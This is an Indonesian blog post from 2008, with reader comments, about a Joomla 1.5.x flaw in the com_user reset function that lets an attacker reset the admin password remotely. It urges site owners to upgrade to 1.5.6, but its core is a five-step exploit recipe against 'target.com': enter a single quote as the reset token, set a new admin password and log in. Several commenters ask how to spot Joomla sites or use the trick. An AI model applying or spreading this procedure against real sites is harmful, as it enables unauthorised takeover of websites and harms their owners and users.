Asides

website murah

Joomla 1.5.x Remote Admin Password Change

By brokencode August 20, 2008 Email This Post Email This Post Print This Post Print This Post Post a comment

Sebuah tim hacker Polandia mengumumkan telah menemukan bug pada file /components/com_user/controller.php Joomla 1.5.x yang memungkinkan penyerang melakukan reset password Admin secara remote.

Mungkin para webmaster situs-situs pemerintah yang ‘diam-diam’ menggunakan Joomla 1.5.x harus segera mengambil tindakan dengan mem-patch sesegera mungkin hole ini atau mengupgrade ke versi terbaru 1.5.6 yang dirilis 12 Agustus.

1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field “token” char ‘ and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password

Selengkapnya : Milw0rm

Posting lain yang kemungkinan berhubungan :
Print This PostTags: ,

Discussion

16 comments for “Joomla 1.5.x Remote Admin Password Change”

  1. maksudnya
    field “token” char ‘
    itu apaan bos?

    sowry, gw newbie. Mohon arahannya

    Posted by paank Fachrezi | August 20, 2008, 12:10 pm

  2. token itu kayak kode yang dikirim ke email kalo kita lupa pasword nah di kolom tokennya lo masukin aja ‘ terus submit.. hehehe.. CMIIW om

    Posted by pandi merdeka | August 20, 2008, 8:50 pm

  3. hehe maaf ketinggalan itu buat reset pass doang kan tapi kalo usernamenya bukan admin gimana wkakakaka ~kabur

    Posted by pandi merdeka | August 20, 2008, 8:52 pm

  4. Baru minggu ini saya tahu bugs nya joomla, dan cukup merepotkan saya juga sebagai personel yang sedikit banyak berhubungan denga hal ini :(

    Posted by @del | August 21, 2008, 12:49 am

  5. untung gak pake joomla :D

    Posted by Biho | August 21, 2008, 8:25 am

  6. @pandi merdeka
    Thanks infonya. btw, buat nandain kalo suatu situs pake Joomla apa bukan gimana?

    Posted by paank Fachrezi | August 21, 2008, 9:24 am

  7. Nggak pake Joomla, jadi tenang aja.. hehehe

    Posted by Bisnis Online | August 21, 2008, 1:00 pm

  8. Wah, aku masih ingusan tentang Joomla, jadi kagak bisa komentar banyak..

    Posted by Duit Gratisan | August 22, 2008, 9:30 am

  9. Belum mau pindah dari joomla 1.0 ke joomla 1.5 nih soalnya ekstensi buat nyari duit lewat internet belum banyak yang buat
    kalo saya mah fanatik make joomla 1.0 kan jarang orang ngblog make joomla he… he…

    Posted by joomblo | August 23, 2008, 2:51 am

  10. gawat juga yahh… harus banyak belajar nih,.,..

    Posted by kikil admin | August 27, 2008, 10:29 am

  11. apa cuma password aja? cara upgrade jd 1.5.6 gmn ya? kalo masi pk 1.0 gmn?

    Posted by fay | August 30, 2008, 9:06 am

  12. kalo pake 1.0 masih aman koq… gue juga pake…-:)

    Posted by adellia | August 30, 2008, 9:16 am

  13. Untung aku sering pakek 1.0 jadi enggak kerepotan migrasi ke 1.5.6 he….

    Posted by Bambangxp | September 2, 2008, 3:53 pm

  14. web saya juga di hach, ga bisa masuk admin… tapi dg petunjuk di atas mantaaaaaaaaaap euy…

    Posted by yusuf | October 15, 2008, 4:44 am

  15. emh… kalo untuk mengantisipasi “token”/reset password itu gmn omz?

    Posted by re4n | November 17, 2008, 8:09 pm

  16. hi im amir from pakistan

    Posted by amir | November 25, 2008, 4:45 pm

Post a comment (Do-Follow, please be wise !)

Bloggers Unite
Livecommunity powered by six groups